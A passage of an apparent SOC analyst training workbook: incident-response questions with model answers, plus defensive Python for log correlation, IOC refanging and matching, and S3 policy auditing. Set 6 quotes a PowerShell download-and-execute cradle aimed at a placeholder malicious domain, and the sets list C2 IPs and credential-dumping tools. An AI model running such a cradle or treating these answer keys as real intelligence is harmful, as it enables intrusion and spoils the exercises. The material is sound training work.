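if __name__ == "__main__":
    result = detect_chain(EVENTS)
    for name, when, detail in result["stages"]:
        print(f"{when} {name:<22} {detail}")
    print("full chain:", result["lateral_movement"], "from", result["source"])
```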

SET 3

1. What was the size of the data exfiltrated during the attack?

Answer: The logs indicate that approximately 4.5 MB of data was transferred to the C2
server at 45.67.89.123.

2. Which protocol was used for data exfiltration?

Answer: The attacker used the HTTPS protocol for the exfiltration, as shown in the firewall
and proxy logs.

3. What domain is associated with the data exfiltration attempt?

Answer: The domain upload.malicious-c2[.]com is associated with the data exfiltration, resolved to 45.67.89.123.

4. What triggered the SIEM's "Unusual Data Transfer Volume" rule?

Answer: A single data transfer of 4.5 MB from SERVER-02 to the external IP 45.67.89.123
was identified as anomalous.

5. What action was taken against the HTTP data exfiltration attempt?

Answer: The HTTP request to malware-c2[.]com was blocked by the proxy, as indicated in
the logs.

6. What other evidence suggests malicious intent in the data exfiltration?

Answer: DNS queries to known malicious domains (malware-c2[.]com) and large HTTPS
transfers to external IPs are clear signs of data exfiltration.

7. Why is using HTTPS advantageous for attackers during data exfiltration?

Answer: HTTPS encrypts traffic, making it harder to inspect and detect malicious
activities.

8. What additional steps can be taken to confirm the content of the exfiltrated data?

Answer: Investigate packet capture logs (if available) or analyse file transfer details from
the affected host.

9. What mitigation measures could prevent such data exfiltration in the future?

Answer: Implement data loss prevention (DLP) systems, block known malicious domains
and monitor unusual data transfer patterns.

10. How can threat intelligence enhance detection of such attacks?

Answer: Threat intelligence can provide updated indicators of compromise (IOCs), such
as malicious domains and IPs, for correlation and real-time detection.

SET 4

1. What is the name of the suspicious file detected on the endpoint?

Answer: The suspicious file is named payload.exe.

2. Where was the malware downloaded from?

Answer: The malware was downloaded from http://malicious-site[.]com/payload.exe.

3. What did the malware attempt to do after execution?

Answer: The malware attempted to establish persistence by creating a registry key (HKCU\...\Run\malware_startup) and connecting to a command-and-control (C2) server.

4. How was the malware identified as malicious?

Answer: Endpoint detection systems flagged the file based on its behavior and VirusTotal
analysis showed it was detected by 54/60 vendors.

5. Which registry key was modified as part of the malware's persistence mechanism?

Answer: The malware modified HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup.

6. What C2 communication was detected in the network traffic logs?

Answer: The malware communicated with a C2 server at 203.0.113.50 using the HTTPS
protocol.

7. What was the parent process for the malicious executable?

Answer: The parent process for payload.exe was explorer.exe.

8. What specific mitigations could have stopped this malware earlier in the kill chain?

Answer: URL filtering could block access to malicious sites and endpoint protection could
prevent execution of untrusted files.

9. How would you ensure the malware is completely removed from the system?

Answer: Steps include removing the registry key, deleting the file, terminating malicious
processes and scanning the system with antivirus software.

10. How can the SOC team strengthen defenses against similar attacks?

Answer: Implementing application whitelisting, enhancing network monitoring for C2
communication and educating users to avoid downloading files from untrusted sources.

SET 5

1. What suspicious activity was performed by the user?

Answer: The user, Izzmier, accessed and exported a full customer database (Finance_DB)
outside of normal working hours.

2. What mechanism was used to transfer the exported file?

Answer: Izzmier transferred the file customers_2024.csv to an external USB drive.

3. Why is this behavior considered suspicious?

Answer: The access occurred outside of normal business hours, involved a large data
export and the file was moved to an unauthorised external device.

4. What rule triggered the alert in the SIEM system?

Answer: The rule "Access to sensitive tables after business hours" was triggered when
Izzmier accessed the Finance_DB at 21:05.

5. Was there any indication of external sharing of the exported data?

Answer: Yes, the network logs show a transfer of 10 MB from Izzmier’s system to an
external IP (203.0.113.200) over HTTPS.

6. What additional evidence confirms data exfiltration?

Answer: Both the network logs indicating external data transfer and the endpoint logs
showing a file upload to a USB device confirm exfiltration.

7. What steps should be taken to mitigate the incident immediately?

Answer: Disable Izzmier’s account, confiscate the USB drive, block the external IP address
and initiate an investigation into the destination server.

8. How could this incident have been prevented?

Answer: Implementing data loss prevention (DLP) tools, restricting external storage
devices and monitoring sensitive data access in real-time could have helped prevent the
incident.

9. What potential business impacts could arise from this incident?


Answer: Leakage of customer data could result in regulatory fines, reputational damage
and loss of customer trust.

10. What corrective actions should be taken for future insider threats?

Answer: Strengthen access controls, enforce least privilege, conduct regular employee
audits and increase monitoring during the resignation period of employees.
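
Q3, Q4 and Q6 describe one detection: a SIEM rule for after-hours access to a sensitive table, then correlation of that hit with the endpoint (USB copy) and network (external transfer) evidence. The Python below is an added example, not part of the exercise, and runs over constructed key=value records whose field names, thresholds, business-hours window and internal ranges are all assumptions. It also shows a caveat worth knowing: Python's ipaddress.is_private treats the documentation range 203.0.113.0/24 as private, so the exercise's external IP would be misclassified by that shortcut; the code uses explicit internal networks instead.

```python
from datetime import datetime, time
from ipaddress import ip_address, ip_network

# Constructed sample records (field names are assumptions, not the exercise's log format).
DB_AUDIT = [
    "2024-12-26T09:15:00Z user=alice db=Finance_DB table=customers action=SELECT rows=120",
    "2024-12-26T21:05:00Z user=Izzmier db=Finance_DB table=customers action=EXPORT rows=250000",
    "2024-12-26T22:10:00Z user=bob db=Inventory_DB table=stock action=SELECT rows=40",
]
ENDPOINT = [
    "2024-12-26T21:12:40Z host=WS-IZZMIER user=Izzmier event=file_copy file=customers_2024.csv dest_type=usb",
]
NETWORK = [
    "2024-12-26T21:20:05Z src=10.0.0.25 user=Izzmier dst=203.0.113.200 proto=https bytes=10485760",
]

SENSITIVE_DBS = {"Finance_DB"}
BUSINESS_HOURS = (time(8, 0), time(18, 0))      # assumed working hours
EXPORT_ROW_THRESHOLD = 10_000                   # assumed "large export" size
EXFIL_BYTES_THRESHOLD = 5 * 1024 * 1024         # assumed "large transfer" size
# Explicit internal ranges: ipaddress.is_private would wrongly call 203.0.113.200 private.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_kv(line):
    ts, _, rest = line.partition(" ")
    ev = dict(tok.split("=", 1) for tok in rest.split())
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def outside_business_hours(ts):
    start, end = BUSINESS_HOURS
    return not (start <= ts.time() < end)


def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def after_hours_sensitive_access(db_lines):
    """The rule from Q4: a sensitive database touched outside business hours."""
    return [ev for ev in map(parse_kv, db_lines)
            if ev["db"] in SENSITIVE_DBS and outside_business_hours(ev["ts"])]


def build_cases(db_lines, endpoint_lines, network_lines):
    """Correlate each rule hit with removable-media and external-transfer evidence."""
    cases = {}
    for ev in after_hours_sensitive_access(db_lines):
        c = cases.setdefault(ev["user"], {"after_hours_access": True, "large_export": False,
                                          "removable_media": False, "external_transfer": False})
        if ev["action"] == "EXPORT" and int(ev["rows"]) >= EXPORT_ROW_THRESHOLD:
            c["large_export"] = True
    for ev in map(parse_kv, endpoint_lines):
        if ev["user"] in cases and ev.get("dest_type") == "usb":
            cases[ev["user"]]["removable_media"] = True
    for ev in map(parse_kv, network_lines):
        if (ev["user"] in cases and is_external(ev["dst"])
                and int(ev["bytes"]) >= EXFIL_BYTES_THRESHOLD):
            cases[ev["user"]]["external_transfer"] = True
    # One point per independent evidence source; 4 means every source agrees.
    for c in cases.values():
        c["score"] = sum(1 for v in c.values() if v is True)
    return cases


if __name__ == "__main__":
    for user, case in build_cases(DB_AUDIT, ENDPOINT, NETWORK).items():
        print(user, case)
```

The score is deliberately additive rather than a single boolean: an after-hours export alone is a lead, but the same user then copying to USB and pushing a large transfer to an external address is what lets the analyst answer Q6 with confidence.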

SET 6

1. What is the suspected threat actor involved in this incident?

Answer: The suspected threat actor is APT-29.

2. Which hosts are identified as compromised?

Answer: The compromised hosts are SERVER-DB01, SERVER-APP01 and SERVER-FILE01.

3. What malicious tool was used for credential dumping?

Answer: The tool used for credential dumping was mimikatz.exe.

4. What PowerShell command was executed on SERVER-DB01 and what was its
purpose?

Answer: The command executed was iex(New-Object
Net.WebClient).DownloadString('http://malicious-site[.]com/init.ps1'). Its purpose was to
download and execute a malicious script.

5. Which two external IPs were communicating with the internal network and why is
this significant?

Answer: The external IPs 192.0.2.55 and 104.21.65.140 were communicating with the
network. These are known C2 IPs associated with APT-29.

6. How was privileged access granted during the attack?

Answer: Privileged access was granted through an event (ID: 4672) involving the SYSTEM
account on SERVER-DB01.

7. What indicators of compromise (IOCs) should be shared with other teams for
proactive defense?

Answer: IOCs include:

• External IPs: 192.0.2.55, 104.21.65.140
• Domain: http://malicious-site[.]com
• Tools: mimikatz.exe, init.ps1

8. What immediate containment actions should be taken for this incident?

Answer: Immediate actions include:

• Isolating compromised hosts (SERVER-DB01, SERVER-APP01, SERVER-FILE01).
• Blocking C2 IPs and domains in firewalls.
• Revoking and resetting credentials for affected accounts.

9. What detection gaps were exploited by the attacker?

Answer: Gaps included insufficient monitoring of PowerShell activity and inadequate
prevention of lateral movement between hosts.

10. How can threat hunting processes be improved to prevent future incidents?

Answer: Improvements include:

• Regular threat intelligence updates.
• Enhanced PowerShell script logging and analysis.
• Deploying endpoint detection tools with behavioral analysis capabilities.

SET 7

1. What type of attack is observed in this incident?

Answer: A zero-day exploit targeting a vulnerable PHP file upload module to achieve
remote code execution.

2. How did the attacker gain access to the web server?

Answer: The attacker exploited the vulnerable_endpoint.php by uploading and executing a
malicious file (malicious_shell.php).

3. What was the IP address of the attacker?

Answer: The attacker’s IP address was 203.0.113.45.

4. What actions were taken by the malicious file after upload?

Answer: The file was executed, potentially granting the attacker remote access to the web
server.

5. Which hosts were involved in the network traffic during the incident?

Answer: The involved hosts were the attacker (203.0.113.45), the web server
(192.168.10.20) and another external IP (203.0.113.46), possibly a Command-and-Control
(C2) server.

6. What immediate containment steps should be taken?

Answer:

• Disconnect the affected server from the network.
• Remove the malicious file (malicious_shell.php).
• Block the attacker’s IP address (203.0.113.45).

7. How should the vulnerability be mitigated, considering no patch is available?

Answer: Disable the vulnerable file upload functionality temporarily and implement input
validation and sanitisation.

8. What proactive measures could have prevented this attack?

Answer:

• Implementing Web Application Firewall (WAF) rules to block malicious payloads.
• Regularly scanning for vulnerabilities.
• Hardening the web server and restricting upload directories.

9. What logs provided evidence of the malicious activity?

Answer:

• Web server logs showed the malicious payload upload.
• File system logs confirmed the creation and execution of malicious_shell.php.
• SIEM alerts flagged suspicious file upload behavior.

10. What potential impact could this attack have if not contained?

Answer:

• Data theft or leakage.
• Compromise of other internal systems through lateral movement.
• Use of the server for further attacks, such as launching malware or phishing
campaigns.

SET 8

1. How did the attacker deliver the malicious payload?

Answer: The attacker delivered the payload via a spear-phishing email masquerading as a
trusted vendor update.

2. What file was executed by the target user and what was its hash?

Answer: The file update_security_patch.exe was executed, with the hash
e3b0c44298fc1c149afbf4c8996fb924.

3. What suspicious activity occurred on the workstation after the file execution?

Answer:

• Execution of an unauthorised PowerShell command.
• Communication with suspicious external IPs and a malicious domain (malicious-c2[.]com).

4. What are the suspected Command-and-Control (C2) IPs?

Answer:

• 192.0.2.200
• 203.0.113.10

5. What immediate actions should be taken to contain the threat?

Answer:

• Isolate WORKSTATION-102 from the network.
• Block C2 IPs and domains in the firewall.
• Notify the vendor about the potential supply chain compromise.

6. What indicators suggest this was a supply chain attack?

Answer:

• The email appeared to originate from a trusted vendor ([email protected]).
• A legitimate-looking executable was attached but executed malicious commands.

7. How can the organisation validate the legitimacy of the vendor’s email?

Answer: By contacting the vendor through official channels and verifying the email’s
content and attachment.

8. What logs provided evidence of communication with malicious infrastructure?

Answer:

• Firewall logs showing HTTPS communication with external IPs.
• DNS query logs showing a resolution request for malicious-c2[.]com.

9. What proactive defenses could mitigate supply chain attacks in the future?

Answer:

• Implementing email filtering for suspicious attachments.
• Using endpoint protection with enhanced behavioral detection.
• Verifying all vendor communications and updates.

10. What steps should be taken to determine the scope of this compromise?

Answer:

• Analyse all logs for similar activities on other endpoints.
• Scan for the executable’s presence across the network.
• Check for additional outbound connections to known malicious C2 servers.
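
SET 6 Q7 shares IOCs in defanged form (hxxp, [.]), and SET 8 Q8 and Q10 ask for those same kinds of indicators to be matched against firewall and DNS logs across the estate. The Python below is an added example, not part of the exercise, that covers both: it refangs the shared list, separates IPs from domains (reducing URLs to their host), and matches destination IPs and DNS queries including subdomains of a listed domain. The log lines and the defanged list are constructed; the IPs and domains in them are the ones the exercise names.

```python
import re
from ipaddress import ip_address

# Constructed IOC list as it would be handed between teams (SET 6 and SET 8 indicators).
SHARED_IOCS = [
    "192.0.2.55", "104.21.65.140",           # SET 6 C2 IPs
    "hxxp://malicious-site[.]com/init.ps1",  # SET 6 download URL, defanged
    "192.0.2.200", "203.0.113.10",           # SET 8 C2 IPs
    "malicious-c2[.]com",                    # SET 8 domain, defanged
]

# Constructed log lines (not from the exercise). 93.184.216.34 and example.com are benign.
FIREWALL_LOGS = [
    "2024-12-26T10:01:02Z src=192.168.10.55 dst=104.21.65.140 dport=443 proto=HTTPS action=ALLOWED",
    "2024-12-26T10:02:10Z src=192.168.10.55 dst=93.184.216.34 dport=443 proto=HTTPS action=ALLOWED",
    "2024-12-26T11:30:44Z src=192.168.20.12 dst=203.0.113.10 dport=443 proto=HTTPS action=ALLOWED",
]
DNS_LOGS = [
    "2024-12-26T11:30:40Z client=192.168.20.12 query=malicious-c2.com type=A rcode=NOERROR",
    "2024-12-26T11:31:00Z client=192.168.20.12 query=www.example.com type=A rcode=NOERROR",
    "2024-12-26T11:45:00Z client=192.168.20.13 query=cdn.malicious-c2.com type=A rcode=NOERROR",
]


def refang(ioc):
    """Undo common defanging so the indicator compares equal to what logs contain."""
    s = re.sub(r"^hxxp", "http", ioc.strip(), flags=re.I)
    for defanged, real in (("[.]", "."), ("(.)", "."), ("[://]", "://"), ("[:]", ":")):
        s = s.replace(defanged, real)
    return s


def classify(ioc):
    """Return ('ip', value) or ('domain', value); a URL is reduced to its host."""
    s = refang(ioc)
    if "://" in s:
        s = s.split("://", 1)[1].split("/", 1)[0]
    try:
        ip_address(s)
        return "ip", s
    except ValueError:
        return "domain", s.lower().rstrip(".")


def build_ioc_sets(iocs):
    ips, domains = set(), set()
    for ioc in iocs:
        kind, value = classify(ioc)
        (ips if kind == "ip" else domains).add(value)
    return ips, domains


def domain_matches(query, domains):
    """Exact match or any subdomain of a listed domain."""
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


def kv(line):
    ts, _, rest = line.partition(" ")
    ev = dict(tok.split("=", 1) for tok in rest.split())
    ev["ts"] = ts
    return ev


def match_logs(iocs, firewall_lines, dns_lines):
    """Return (source, timestamp, internal host, indicator) for every IOC hit."""
    ips, domains = build_ioc_sets(iocs)
    hits = []
    for ev in map(kv, firewall_lines):
        if ev["dst"] in ips:
            hits.append(("firewall", ev["ts"], ev["src"], ev["dst"]))
    for ev in map(kv, dns_lines):
        if domain_matches(ev["query"], domains):
            hits.append(("dns", ev["ts"], ev["client"], ev["query"]))
    return hits


if __name__ == "__main__":
    for hit in match_logs(SHARED_IOCS, FIREWALL_LOGS, DNS_LOGS):
        print(*hit)
```

The subdomain rule matters for the scoping question: an implant that rotates hostnames under the same C2 domain would slip past an exact-string match, and the third DNS line above is exactly that case.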

SET 9

1. What vulnerability allowed the attacker to access sensitive data?

Answer: A misconfigured cloud storage bucket (s3://sensitive-data-bucket/) was set to
public access, enabling anonymous users to list, access and modify files.

2. What actions did the attacker perform on the cloud bucket?

Answer:

• Downloaded a sensitive file (financial_report_2024.xlsx).
• Listed all contents of the bucket.
• Deleted backups from the backups/ folder.

3. What is the source IP of the attacker and why is it significant?

Answer: The attacker’s IP is 203.0.113.55, identified as a known threat actor in the threat
intelligence feed.

4. What was the first indication of the attack?

Answer: Logs showed anonymous access to the bucket with a successful GET request for
sensitive data.

5. What immediate steps should be taken to contain the attack?

Answer:

• Restrict public access to the bucket immediately.
• Revoke all anonymous access policies.
• Block the attacker’s IP address (203.0.113.55).

6. How could this misconfiguration have been prevented?

Answer:

• Implementing least-privilege access controls.
• Regularly auditing cloud storage permissions.
• Using automated tools to detect public buckets.

7. What additional risks does this incident pose?

Answer:

• Exposure of sensitive financial data to unauthorised parties.
• Potential use of the data for extortion or fraud.
• Loss of critical backups, hindering recovery efforts.

8. What further investigation is needed after containment?

Answer:

• Review access logs for additional unauthorised activity.
• Identify other misconfigured resources in the cloud environment.
• Assess the extent of data leakage and possible recovery options.

9. What tools can be used to monitor cloud security more effectively?

Answer:

• AWS CloudTrail for detailed logging.
• SIEM integration with cloud services.
• Automated cloud security posture management tools like Prisma Cloud or AWS
Security Hub.

10. What policies should be implemented to prevent similar incidents?

Answer:

• Enforce encryption for all stored data.
• Require authentication for all cloud resources.
• Set up alerting for public access attempts and sensitive data movements.
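
Q1 and Q6 turn on what "public access" actually means in a bucket policy, and Q6 calls for automated detection of it. The Python below is an added example, not part of the exercise or of any AWS tooling: it evaluates bucket policy documents in the standard IAM policy JSON shape and checks a Public Access Block configuration (the four real setting names). The three policies are constructed to show the weak setting (anonymous principal with list and delete rights, the state described in Q1) beside a locked-down one and a conditional one; the account ID, role name and VPC endpoint ID are placeholders.

```python
import json

# Constructed: the misconfiguration from Q1, anyone may list, read and delete.
PUBLIC_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket", "s3:DeleteObject"],
        "Resource": ["arn:aws:s3:::sensitive-data-bucket", "arn:aws:s3:::sensitive-data-bucket/*"],
    }],
})

# Constructed: the corrected policy, a single named role with read-only access.
LOCKED_DOWN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/finance-reporting"},  # placeholder
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::sensitive-data-bucket/*",
    }],
})

# Constructed: anonymous principal but restricted by a Condition; reported, not public.
VPC_ONLY_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::sensitive-data-bucket/*",
        "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-PLACEHOLDER"}},
    }],
})


def _as_list(x):
    return x if isinstance(x, list) else [x]


def principal_is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"}: anyone, authenticated or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(v == "*" for vals in principal.values() for v in _as_list(vals))
    return False


def analyse_bucket_policy(policy_json):
    """One finding per Allow statement granted to an anonymous principal."""
    policy = json.loads(policy_json)
    findings = []
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not principal_is_anonymous(st.get("Principal")):
            continue
        actions = [a.lower() for a in _as_list(st.get("Action", []))]
        wildcard = any(a in ("s3:*", "*") for a in actions)
        findings.append({
            "sid": st.get("Sid"),
            "conditional": "Condition" in st,   # scoped by a Condition, needs a reviewer
            "actions": actions,
            "allows_listing": wildcard or "s3:listbucket" in actions,
            "allows_write_or_delete": wildcard or any(
                a.startswith(("s3:put", "s3:delete")) for a in actions),
        })
    return findings


def is_public(policy_json):
    """Public = at least one unconditional anonymous Allow."""
    return any(not f["conditional"] for f in analyse_bucket_policy(policy_json))


def public_access_block_enforced(pab):
    """All four S3 Public Access Block settings must be on for the bucket to be safe."""
    required = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")
    return all(pab.get(k) is True for k in required)


if __name__ == "__main__":
    for name, pol in (("public", PUBLIC_POLICY), ("locked", LOCKED_DOWN_POLICY),
                      ("vpc-only", VPC_ONLY_POLICY)):
        print(name, is_public(pol), analyse_bucket_policy(pol))
```

The "allows_listing" and "allows_write_or_delete" flags map directly to the Q2 actions: listing the bucket and deleting backups were both possible only because the anonymous grant went beyond s3:GetObject. Checking the Public Access Block alongside the policy is what Q6's "automated tools" do; a bucket with all four settings on cannot be made public by a later policy edit.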

SET 10

1. How was the malware delivered to the target?

Answer: The malware was delivered via a spear-phishing email containing an attachment
(performance_analysis_tool.exe).

2. What behavior was observed from the malware upon execution?

Answer: The malware exhibited AI-driven capabilities, including:

• Polymorphic behavior (hash changes).
• Identifying unprotected files for exfiltration.
• Evading antivirus detection in real-time.

3. What external IPs were involved in the data exfiltration and what are they
associated with?

Answer:

• 198.51.100.45
• 203.0.113.20

These are known Command-and-Control (C2) servers used in AI-powered malware campaigns.

4. What is the hash of the original and polymorphic malware files?

Answer:

• Original: 8df48e58b0a1fcb99eabcd00112d34f7
• Polymorphic: 4a8b3f9c0ef12a67edbc34500d1f78de

5. What were the volumes of data exfiltrated to the C2 servers?

Answer:

• 198.51.100.45: 15,000 bytes sent.
• 203.0.113.20: 50,000 bytes sent.

6. What immediate containment steps should be taken?

Answer:

• Isolate WORKSTATION-305 from the network.
• Block communication with 198.51.100.45 and 203.0.113.20.
• Perform memory analysis to identify and terminate the AI malware process.

7. What advanced defenses could mitigate AI-driven malware?

Answer:

• Use of AI-based endpoint protection solutions.
• Behavioral analytics tools to detect unusual patterns.
• Zero-trust network segmentation to limit data access.

8. What makes this attack particularly challenging to defend against?

Answer:

• Polymorphic capabilities of the malware.
• Use of AI to adapt and bypass traditional defenses.
• Stealthy data exfiltration using encrypted HTTPS.

9. How can the organisation improve its phishing defenses?

Answer:

• Implement advanced email filtering.
• Conduct regular phishing simulation training.
• Enable multi-factor authentication to reduce the impact of credential harvesting.

10. What follow-up investigations are necessary?

Answer:

• Analyse logs for similar malware activities across the network.
• Review email filters and employee awareness programs.
• Check for unauthorised access to critical systems and files.
